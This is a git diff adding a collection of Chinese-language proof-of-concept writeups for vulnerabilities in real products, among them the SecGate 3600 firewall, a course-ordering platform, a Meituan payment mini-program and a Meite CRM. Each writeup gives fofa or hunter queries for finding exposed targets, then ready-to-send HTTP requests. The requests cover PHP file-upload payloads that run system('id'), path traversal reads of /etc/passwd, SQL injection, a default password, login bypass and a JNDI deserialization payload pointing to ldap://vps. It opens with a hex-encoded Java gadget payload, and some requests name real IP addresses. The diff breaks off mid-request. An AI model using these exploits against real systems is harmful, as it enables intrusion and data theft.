41516341532f3841415141474277424842774248427742494277424a4277424b4277424841414948414573484145663841424d484145662f4141494142416341527763415277634153416341535141424277424d2f5141514277424d427742482f7741434141514841456348414563484145674841456b414151634154663841435141494277424842774248427742494277424a414141414277424e4141442f414149414151634152774141414167415467412f4141454151414141414430414151414241414141434c6741504b6341424575784141454141414144414159414f514143414545414141414f41414d414141414d41414d4144514148414134415267414141416341416b59484145774141414541547741414141494155413d3d223b0a636c7a203d20646566696e65436c617373286261736536344465636f6465546f4279746528636f646529293b0a636c7a2e6e6577496e7374616e636528293b7400046576616c7571007e001b0000000171007e0023737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878;"
+    }
+}
+```
+
+![image-20241227221404049](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272214131.png)
\ No newline at end of file
diff --git a/网神SecGata3600安全网关authManageSet.cgi接口登录绕过漏洞.md b/网神SecGata3600安全网关authManageSet.cgi接口登录绕过漏洞.md
new file mode 100644
index 0000000..267b626
--- /dev/null
+++ b/网神SecGata3600安全网关authManageSet.cgi接口登录绕过漏洞.md
@@ -0,0 +1,31 @@
+# 网神SecGata 3600安全网关authManageSet.cgi 接口登录绕过漏洞
+
+# 一、漏洞简介
+SecGate3600是网神信息技术(北京)股份有限公司旗下一款安全网关产品，网神 SecGate3600 存在登录绕过漏洞，攻击者利用该漏洞可获取管理员密码等敏感信息，进一步控制系统。
+
+# 二、漏洞简介
++ 网神SecGata 3600-A1500
+
+# 三、资产测绘
++ hunter`web.body="sec_gate_image/login_02.gif"`
++ 特征
+
+![1702017961550-3103e894-3910-4147-8286-4abade065d93.png](./img/ASmvAfvQqr_SQdi2/1702017961550-3103e894-3910-4147-8286-4abade065d93-247789.png)
+
+# 四、漏洞复现
+```java
+POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1
+Host: {hostname}
+Content-Type: application/x-www-form-urlencoded
+Cookie: sw_login_name=admin
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+
+type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc
+```
+
+![1702017993631-08fad56b-a74c-498f-82ef-a9ea5bdda175.png](./img/ASmvAfvQqr_SQdi2/1702017993631-08fad56b-a74c-498f-82ef-a9ea5bdda175-354774.png)
+
+
+
+> 更新: 2024-02-29 23:57:15  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lz3gvfl7e9gp74wi>
\ No newline at end of file
diff --git a/网神SecGata3600防火墙app_av_import_save任意文件上传漏洞.md b/网神SecGata3600防火墙app_av_import_save任意文件上传漏洞.md
new file mode 100644
index 0000000..0c8f9a1
--- /dev/null
+++ b/网神SecGata3600防火墙app_av_import_save任意文件上传漏洞.md
@@ -0,0 +1,57 @@
+# 网神SecGata 3600防火墙app_av_import_save任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(0, 0, 0);">网神 SecGate 3600 防火墙 app_av_import_save接口存在任意文件上传漏洞，攻击者通过构造特殊请求包即可获取服务器权限。</font>
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
++ 网神SecGata 3600防火墙
+
+# 三、资产测绘
+    - hunter:`app.name="网神 SecGate"&&web.title=="网神SecGate 3600防火墙"`
+
+![1691631315585-e71862e7-a889-460a-b2f7-a14e396c2f9b.png](./img/8IEiY_3wdr8DnXFC/1691631315585-e71862e7-a889-460a-b2f7-a14e396c2f9b-765098.png)
+
++ 登录页面
+
+![1691631344474-a4ef0b41-65a2-4221-8212-3ca32e0b0b40.png](./img/8IEiY_3wdr8DnXFC/1691631344474-a4ef0b41-65a2-4221-8212-3ca32e0b0b40-843416.png)
+
+# 四、漏洞复现
+```plain
+POST / HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Connection: close
+Content-Length: 451
+Accept-Encoding: gzip, deflate, br
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
+
+------WebKitFormBoundaryJpMyThWnAxbcBBQc
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+10000000
+------WebKitFormBoundaryJpMyThWnAxbcBBQc
+Content-Disposition: form-data; name="reqfile";filename="nhzwe1.php"
+Content-Type: text/plain
+
+<?php echo(md5(13123));unlink(__FILE__);?>
+------WebKitFormBoundaryJpMyThWnAxbcBBQc
+Content-Disposition: form-data; name="submit_post"
+
+app_av_import_save
+------WebKitFormBoundaryJpMyThWnAxbcBBQc--
+```
+
+![1702440125730-b79525ce-efcd-4d20-8d36-50bdd22ff370.png](./img/8IEiY_3wdr8DnXFC/1702440125730-b79525ce-efcd-4d20-8d36-50bdd22ff370-446268.png)
+
+上传文件位置
+
+```plain
+/attachements/nhzwe1.php
+```
+
+![1702440151735-9e4e75b0-e9eb-4901-aff7-a4d496418e49.png](./img/8IEiY_3wdr8DnXFC/1702440151735-9e4e75b0-e9eb-4901-aff7-a4d496418e49-573179.png)
+
+
+
+> 更新: 2024-02-29 23:57:16  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uay6pavy9qt2qc29>
\ No newline at end of file
diff --git a/网神SecGata3600防火墙obj_app_upfile任意文件上传漏洞.md b/网神SecGata3600防火墙obj_app_upfile任意文件上传漏洞.md
new file mode 100644
index 0000000..8f6007e
--- /dev/null
+++ b/网神SecGata3600防火墙obj_app_upfile任意文件上传漏洞.md
@@ -0,0 +1,60 @@
+# 网神SecGata 3600防火墙obj_app_upfile任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(0, 0, 0);">网神 SecGate 3600 防火墙 obj_app_upfile接口存在任意文件上传漏洞，攻击者通过构造特殊请求包即可获取服务器权限。</font>
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
++ 网神SecGata 3600防火墙
+
+# 三、资产测绘
++ hunter:`app.name="网神 SecGate"&&web.title=="网神SecGate 3600防火墙"`
+
+![1691631315585-e71862e7-a889-460a-b2f7-a14e396c2f9b.png](./img/ubfuoBo-P4aj5Y9L/1691631315585-e71862e7-a889-460a-b2f7-a14e396c2f9b-743981.png)
+
++ 登录页面
+
+![1691631344474-a4ef0b41-65a2-4221-8212-3ca32e0b0b40.png](./img/ubfuoBo-P4aj5Y9L/1691631344474-a4ef0b41-65a2-4221-8212-3ca32e0b0b40-583233.png)
+
+# 四、漏洞复现
+<font style="color:rgb(0, 0, 0);">没有对文件调用进行鉴权，且文件上传路径为可访问路径，造成任意文件上传</font>
+
+```java
+POST /?g=obj_app_upfile HTTP/1.1
+Host: xx.xx.xx.xx
+Accept: */*
+Accept-Encoding: gzip, deflate
+Content-Length: 569
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
+User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
+
+------WebKitFormBoundaryJpMyThWnAxbcBBQc
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+10000000
+------WebKitFormBoundaryJpMyThWnAxbcBBQc
+Content-Disposition: form-data; name="upfile"; filename="test.php"
+Content-Type: text/plain
+
+<?php system("id");unlink(__FILE__);?>
+
+------WebKitFormBoundaryJpMyThWnAxbcBBQc
+Content-Disposition: form-data; name="submit_post"
+
+obj_app_upfile
+------WebKitFormBoundaryJpMyThWnAxbcBBQc
+Content-Disposition: form-data; name="__hash__"
+
+0b9d6b1ab7479ab69d9f71b05e0e9445
+------WebKitFormBoundaryJpMyThWnAxbcBBQc--
+```
+
+![1691631427460-499815cb-61ff-42a9-b08f-372c89bab99b.png](./img/ubfuoBo-P4aj5Y9L/1691631427460-499815cb-61ff-42a9-b08f-372c89bab99b-550913.png)
+
+<font style="color:rgb(0, 0, 0);">默认上传路径 </font>`<font style="color:rgb(0, 0, 0);">/secgate/webui/attachements/</font>`<font style="color:rgb(0, 0, 0);"> ， 访问 </font>`<font style="color:rgb(0, 0, 0);">attachements/test.php</font>`<font style="color:rgb(0, 0, 0);"> 文件</font>
+
+![1691631538330-1fdec676-1995-4b7d-84c5-8a5f3e05b79e.png](./img/ubfuoBo-P4aj5Y9L/1691631538330-1fdec676-1995-4b7d-84c5-8a5f3e05b79e-356178.png)
+
+
+
+> 更新: 2024-02-29 23:57:16  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yrkaybyh5yggyktv>
\ No newline at end of file
diff --git a/网神SecGata3600防火墙sec_ssl_agent_import_save任意文件上传漏洞.md b/网神SecGata3600防火墙sec_ssl_agent_import_save任意文件上传漏洞.md
new file mode 100644
index 0000000..cec76b4
--- /dev/null
+++ b/网神SecGata3600防火墙sec_ssl_agent_import_save任意文件上传漏洞.md
@@ -0,0 +1,60 @@
+# 网神SecGata 3600防火墙sec_ssl_agent_import_save任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(0, 0, 0);">网神 SecGate 3600 防火墙 sec_ssl_agent_import_save接口存在任意文件上传漏洞，攻击者通过构造特殊请求包即可获取服务器权限。</font>
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
++ 网神SecGata 3600防火墙
+
+# 三、资产测绘
+    - hunter:`app.name="网神 SecGate"&&web.title=="网神SecGate 3600防火墙"`
+
+![1691631315585-e71862e7-a889-460a-b2f7-a14e396c2f9b.png](./img/-N6yTXZ-Xrvrv3lT/1691631315585-e71862e7-a889-460a-b2f7-a14e396c2f9b-064175.png)
+
++ 登录页面
+
+![1691631344474-a4ef0b41-65a2-4221-8212-3ca32e0b0b40.png](./img/-N6yTXZ-Xrvrv3lT/1691631344474-a4ef0b41-65a2-4221-8212-3ca32e0b0b40-887909.png)
+
+# 四、漏洞复现
+```plain
+POST /?g=sec_ssl_agent_import_save HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
+Content-Length: 343
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: max-age=0
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEkSeIhsa5fnqB0Zn
+Upgrade-Insecure-Requests: 1
+SL-CE-SUID: 1057
+        
+
+------WebKitFormBoundaryEkSeIhsa5fnqB0Zn
+Content-Disposition: form-data; name="reqfile"; filename="2.php"
+Content-Type: text/plain
+
+<?php echo "testvuln";?>
+        
+------WebKitFormBoundaryEkSeIhsa5fnqB0Zn
+Content-Disposition: form-data; name="submit_post"
+
+sec_ssl_agent_import_save
+------WebKitFormBoundaryEkSeIhsa5fnqB0Zn--
+```
+
+![1695735421920-d255f88c-764a-42ec-8149-17edf9f02cf3.png](./img/-N6yTXZ-Xrvrv3lT/1695735421920-d255f88c-764a-42ec-8149-17edf9f02cf3-656138.png)
+
+上传文件位置
+
+```plain
+/attachements/2.php
+```
+
+![1695735454815-44638c44-4f66-43cb-8f54-95d97029eea6.png](./img/-N6yTXZ-Xrvrv3lT/1695735454815-44638c44-4f66-43cb-8f54-95d97029eea6-002177.png)
+
+
+
+> 更新: 2024-02-29 23:57:16  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wmrum6asvg0bsdhy>
\ No newline at end of file
diff --git a/网神SecGata3600防火墙sys_hand_upfile任意文件上传漏洞.md b/网神SecGata3600防火墙sys_hand_upfile任意文件上传漏洞.md
new file mode 100644
index 0000000..bf5c434
--- /dev/null
+++ b/网神SecGata3600防火墙sys_hand_upfile任意文件上传漏洞.md
@@ -0,0 +1,59 @@
+# 网神SecGata 3600防火墙sys_hand_upfile任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(0, 0, 0);">网神 SecGate 3600 防火墙 sys_hand_upfile接口存在任意文件上传漏洞，攻击者通过构造特殊请求包即可获取服务器权限。</font>
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
++ 网神SecGata 3600防火墙
+
+# 三、资产测绘
+    - hunter:`app.name="网神 SecGate"&&web.title=="网神SecGate 3600防火墙"`
+
+![1691631315585-e71862e7-a889-460a-b2f7-a14e396c2f9b.png](./img/W5YK0CmTgjGYZMx7/1691631315585-e71862e7-a889-460a-b2f7-a14e396c2f9b-558082.png)
+
++ 登录页面
+
+![1691631344474-a4ef0b41-65a2-4221-8212-3ca32e0b0b40.png](./img/W5YK0CmTgjGYZMx7/1691631344474-a4ef0b41-65a2-4221-8212-3ca32e0b0b40-349914.png)
+
+# 四、漏洞复现
+```plain
+POST /?g=sys_hand_upfile HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Trident/3.0)
+Content-Length: 261
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: close
+Content-Type: multipart/form-data; boundary=cmqfdwckb52z6zvzzjgm
+Connection: close
+
+--cmqfdwckb52z6zvzzjgm
+Content-Disposition: form-data; name="upfile"; filename="7litvvzvnk.php"
+
+<?php echo 111*111;unlink(__FILE__);?>
+--cmqfdwckb52z6zvzzjgm
+Content-Disposition: form-data; name="submit_post"
+
+sys_hand_upfile
+--cmqfdwckb52z6zvzzjgm--
+```
+
+![1706024999167-a34f561c-297b-47a9-a171-ec6bb308ca82.png](./img/W5YK0CmTgjGYZMx7/1706024999167-a34f561c-297b-47a9-a171-ec6bb308ca82-529354.png)
+
+上传文件位置
+
+```plain
+GET /attachements/7litvvzvnk.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Trident/3.0)
+Connection: close
+Cookie: __s_sessionid__=jvdi0lqirs2c3ilvut5t2qluv6
+Accept-Encoding: gzip, deflate
+```
+
+![1706025015329-f5902d0c-5062-41fc-96c5-2cbfe53ad317.png](./img/W5YK0CmTgjGYZMx7/1706025015329-f5902d0c-5062-41fc-96c5-2cbfe53ad317-870523.png)
+
+
+
+> 更新: 2024-02-29 23:57:16  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zbdg597pe4ckn0gk>
\ No newline at end of file
diff --git a/网神SecGata3600防火墙存在任意文件下载漏洞.md b/网神SecGata3600防火墙存在任意文件下载漏洞.md
new file mode 100644
index 0000000..0ac3a63
--- /dev/null
+++ b/网神SecGata3600防火墙存在任意文件下载漏洞.md
@@ -0,0 +1,38 @@
+# 网神SecGata 3600防火墙存在任意文件下载漏洞
+
+# 一、漏洞简介
+网神SecGata 3600防火墙存在任意文件下载漏洞
+
+# 二、影响版本
++ 网神SecGata 3600防火墙
+
+# 三、资产测绘
++ hunter`app.name="网神 SecGate"`
++ 特征
+
+![1699025464055-779b228f-776a-4779-bd37-dc1169b22d30.png](./img/BZE6j-rjWFII193w/1699025464055-779b228f-776a-4779-bd37-dc1169b22d30-146282.png)
+
+# 四、漏洞复现
+```plain
+GET /?g=sys_export_conf_local_save&file_name=../modules/system/import_export.mds HTTP/1.1
+Host: xx.xx.xx.xx
+Cookie: __s_sessionid__=5543sd9rcbiklqs1ttignkqvt6
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1699025619992-0db92bcd-d757-4eee-9ef5-2c1ca8153978.png](./img/BZE6j-rjWFII193w/1699025619992-0db92bcd-d757-4eee-9ef5-2c1ca8153978-977623.png)
+
+
+
+> 更新: 2024-02-29 23:57:16  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bql4k8u8x1l3ar5t>
\ No newline at end of file
diff --git a/网神SecGate-3600-防火墙sys_hand_upfile-任意文件上传漏洞.md b/网神SecGate-3600-防火墙sys_hand_upfile-任意文件上传漏洞.md
new file mode 100644
index 0000000..2b23a17
--- /dev/null
+++ b/网神SecGate-3600-防火墙sys_hand_upfile-任意文件上传漏洞.md
@@ -0,0 +1,36 @@
+## 网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞
+
+ 网神 SecGate 3600 防火墙 sys_hand_upfile 存在任意文件上传漏洞，攻击者可构造特殊 HTTP 请求上传任意文件获取服务器权限，执行恶意命令等。
+
+ ## fofa
+ ```
+body="./images/lsec/login/loading.gif"
+title="网神SecGate 3600防火墙"
+```
+
+## poc
+```
+POST /?g=sys_hand_upfile HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Trident/3.0)
+Content-Length: 244
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=gttd4i4aadwh9lmlp1ez
+ 
+--gttd4i4aadwh9lmlp1ez
+Content-Disposition: form-data; name="upfile"; filename="ceshi.php"
+ 
+<?php echo md5('666');unlink(__FILE__);?>
+--gttd4i4aadwh9lmlp1ez
+Content-Disposition: form-data; name="submit_post"
+ 
+sys_hand_upfile
+--gttd4i4aadwh9lmlp1ez--
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/6ba66f9f-affd-4600-ac29-2cfe98502b45)
+
+访问文件路径
+http//127.0.0.1/attachements/ceshi.php
diff --git a/网神防火墙-app_av_import_save文件上传漏洞.md b/网神防火墙-app_av_import_save文件上传漏洞.md
new file mode 100644
index 0000000..314e952
--- /dev/null
+++ b/网神防火墙-app_av_import_save文件上传漏洞.md
@@ -0,0 +1,77 @@
+
+## 网神防火墙 app_av_import_save文件上传漏洞
+
+## fofa
+```
+title="网神SecGate 3600防火墙"
+```
+
+
+## exp
+```
+POST 
+HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
+Cache-Control: no-cache
+Pragma: no-cache
+Host: 218.60.144.129
+Content-Length: 536
+
+------WebKitFormBoundaryJpMyThWnAxbcBBQc
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+10000000
+------WebKitFormBoundaryJpMyThWnAxbcBBQc
+Content-Disposition: form-data; name="upfile"; filename="test.txt"
+Content-Type: text/plain
+
+test111
+------WebKitFormBoundaryJpMyThWnAxbcBBQc
+Content-Disposition: form-data; name="submit_post"
+
+obj_app_upfile
+------WebKitFormBoundaryJpMyThWnAxbcBBQc
+Content-Disposition: form-data; name="__hash__"
+
+0b9d6b1ab7479ab69d9f71b05e0e9445
+------WebKitFormBoundaryJpMyThWnAxbcBBQc--
+```
+
+```
+POST /?g=obj_app_upfile HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
+Cache-Control: no-cache
+Pragma: no-cache
+Host: 218.60.144.129
+Content-Length: 536
+
+------WebKitFormBoundaryJpMyThWnAxbcBBQc
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+10000000
+------WebKitFormBoundaryJpMyThWnAxbcBBQc
+Content-Disposition: form-data; name="upfile"; filename="test.txt"
+Content-Type: text/plain
+
+test111
+------WebKitFormBoundaryJpMyThWnAxbcBBQc
+Content-Disposition: form-data; name="submit_post"
+
+obj_app_upfile
+------WebKitFormBoundaryJpMyThWnAxbcBBQc
+Content-Disposition: form-data; name="__hash__"
+
+0b9d6b1ab7479ab69d9f71b05e0e9445
+------WebKitFormBoundaryJpMyThWnAxbcBBQc--
+```
+
+## 漏洞复现
+![](./assets/20231129204159.png)
diff --git a/网课交单平台epay存在SQL注入漏洞.md b/网课交单平台epay存在SQL注入漏洞.md
new file mode 100644
index 0000000..8d18f28
--- /dev/null
+++ b/网课交单平台epay存在SQL注入漏洞.md
@@ -0,0 +1,56 @@
+# 网课交单平台epay存在SQL注入漏洞
+
+# 一、漏洞简介
+网课交单平台是一款和发卡网对接的网课代学平台，拥有聚合支付，论文编辑等功能，其后台的可用性及可靠性得到了使用者的认可。网课交单平台某接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。
+
+# 二、影响版本
++ 网课交单平台
+
+# 三、资产测绘
+```http
+"/apisub.php"
+```
+
+![1718193605379-22758e9d-9d5a-41a0-ba54-3cb86c6a26c9.png](./img/pSqHXnKzl_2lNnxt/1718193605379-22758e9d-9d5a-41a0-ba54-3cb86c6a26c9-427126.png)
+
+# 四、漏洞复现
+```java
+POST /epay/epay.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 157
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+Priority: u=1
+
+out_trade_no=' UNION ALL SELECT 1,CONCAT(IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),3,4,5,6,7,8,9,10,11,12,13-- -
+```
+
+![1718193755161-d81335ad-f1dc-4afd-a512-cc764cbb611a.png](./img/pSqHXnKzl_2lNnxt/1718193755161-d81335ad-f1dc-4afd-a512-cc764cbb611a-504810.png)
+
+```java
+POST /epay/epay.php HTTP/1.1
+Host: 101.33.219.180:89
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 157
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+Priority: u=1
+
+out_trade_no=1
+```
+
+![1718193897061-a7e073aa-236a-42d0-a753-5aae192ddcc1.png](./img/pSqHXnKzl_2lNnxt/1718193897061-a7e073aa-236a-42d0-a753-5aae192ddcc1-738243.png)
+
+
+
+> 更新: 2024-06-17 09:30:05  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/na3widtrnccyuruh>
\ No newline at end of file
diff --git a/网课交单平台存在默认口令漏洞.md b/网课交单平台存在默认口令漏洞.md
new file mode 100644
index 0000000..2d977cc
--- /dev/null
+++ b/网课交单平台存在默认口令漏洞.md
@@ -0,0 +1,26 @@
+# 网课交单平台存在默认口令漏洞
+
+# 一、漏洞简介
+网课交单平台是一款和发卡网对接的网课代学平台，拥有聚合支付，论文编辑等功能，其后台的可用性及可靠性得到了使用者的认可。网课交单平台存在默认口令漏洞
+
+# 二、影响版本
++ 网课交单平台
+
+# 三、资产测绘
+```http
+"/apisub.php"
+```
+
+![1718193605379-22758e9d-9d5a-41a0-ba54-3cb86c6a26c9.png](./img/WZsF9pK89MiNKRej/1718193605379-22758e9d-9d5a-41a0-ba54-3cb86c6a26c9-308997.png)
+
+# 四、漏洞复现
+```java
+123456/123456
+```
+
+![1718194900487-1f28f246-14af-4738-9e83-e4077a6b12e7.png](./img/WZsF9pK89MiNKRej/1718194900487-1f28f246-14af-4738-9e83-e4077a6b12e7-296525.png)
+
+
+
+> 更新: 2024-06-17 09:30:05  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vqrfx5mpfrfsuhgt>
\ No newline at end of file
diff --git a/美团代付微信小程序系统read.php任意文件读取漏洞.md b/美团代付微信小程序系统read.php任意文件读取漏洞.md
new file mode 100644
index 0000000..1ad2e1a
--- /dev/null
+++ b/美团代付微信小程序系统read.php任意文件读取漏洞.md
@@ -0,0 +1,26 @@
+# 美团代付微信小程序系统read.php任意文件读取漏洞
+
+美团代付微信小程序系统 read.php 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+
+```javascript
+body="/h5/static/js/chunk-vendors.js"
+```
+
+## poc
+
+```javascript
+POST /static/ueditor22/_test/tools/br/read.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+name=../../../../../../../../../etc/passwd
+```
+
+![image-20241114142630011](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141426075.png)
\ No newline at end of file
diff --git a/美团代付微信小程序系统read存在任意文件读取漏洞.md b/美团代付微信小程序系统read存在任意文件读取漏洞.md
new file mode 100644
index 0000000..b142964
--- /dev/null
+++ b/美团代付微信小程序系统read存在任意文件读取漏洞.md
@@ -0,0 +1,35 @@
+# 美团代付微信小程序系统read存在任意文件读取漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.84);">美团代付微信小程序系统是美团点评旗下的一款基于微信小程序技术开发的应用程序功能之一，它允许用户方便快捷地请求他人为自己支付订单费用。随着移动支付的普及和微信小程序的广泛应用，美团作为中国领先的本地生活服务平台，推出了代付功能，以满足用户多样化的支付重求。通过微信小程序，用户可以轻松实现代付操作，无需跳转到其他应用或网页，提高了支付的便捷性和效率。前台支持购物车，个人中心，多选项等功能 ，后台支持推广，代理管理，菜品管理，积分明细，订单管理，模板，支付通道管理等功能。美团代付微信小程序系统read存在任意文件读取漏洞</font>
+
+# <font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>
++ 美团代付微信小程序系统 
+
+# 三、资产测绘
+```plain
+body="/h5/static/js/chunk-vendors.js"
+```
+
+![1731078960863-27f91f64-e014-42be-b150-31c628bcc3fc.png](./img/cXUMgsA9n5GhpcIa/1731078960863-27f91f64-e014-42be-b150-31c628bcc3fc-651366.png)
+
+# 四、漏洞复现
+```plain
+POST /static/ueditor22/_test/tools/br/read.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+ 
+name=../../../../../../../../../etc/passwd
+```
+
+![1731078883672-59e6b35a-2fe2-4f03-a02e-7dd31ca97c13.png](./img/cXUMgsA9n5GhpcIa/1731078883672-59e6b35a-2fe2-4f03-a02e-7dd31ca97c13-666911.png)
+
+
+
+> 更新: 2024-11-27 10:00:37  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ymuepw56n41ianbg>
\ No newline at end of file
diff --git a/美特CRM系统接口sync_emp_weixin存在反序列化漏洞.md b/美特CRM系统接口sync_emp_weixin存在反序列化漏洞.md
new file mode 100644
index 0000000..f035abd
--- /dev/null
+++ b/美特CRM系统接口sync_emp_weixin存在反序列化漏洞.md
@@ -0,0 +1,29 @@
+# 美特CRM系统接口sync_emp_weixin存在反序列化漏洞
+
+美特CRM sync_emp_weixin存在反序列化漏洞，可被恶意攻击者利用执行任意命令，进而控制服务器系统。
+
+## fofa
+
+```
+body="/common/scripts/basic.js"
+```
+
+## poc
+
+```javascript
+GET /weixin/admin/sync_emp_weixin.jsp?emp_json=[{%22@type%22:%22[com.sun.rowset.JdbcRowSetImpl%22[{,%22dataSourceName%22:%22ldap://vps%22,%22autoCommit%22:true}] HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
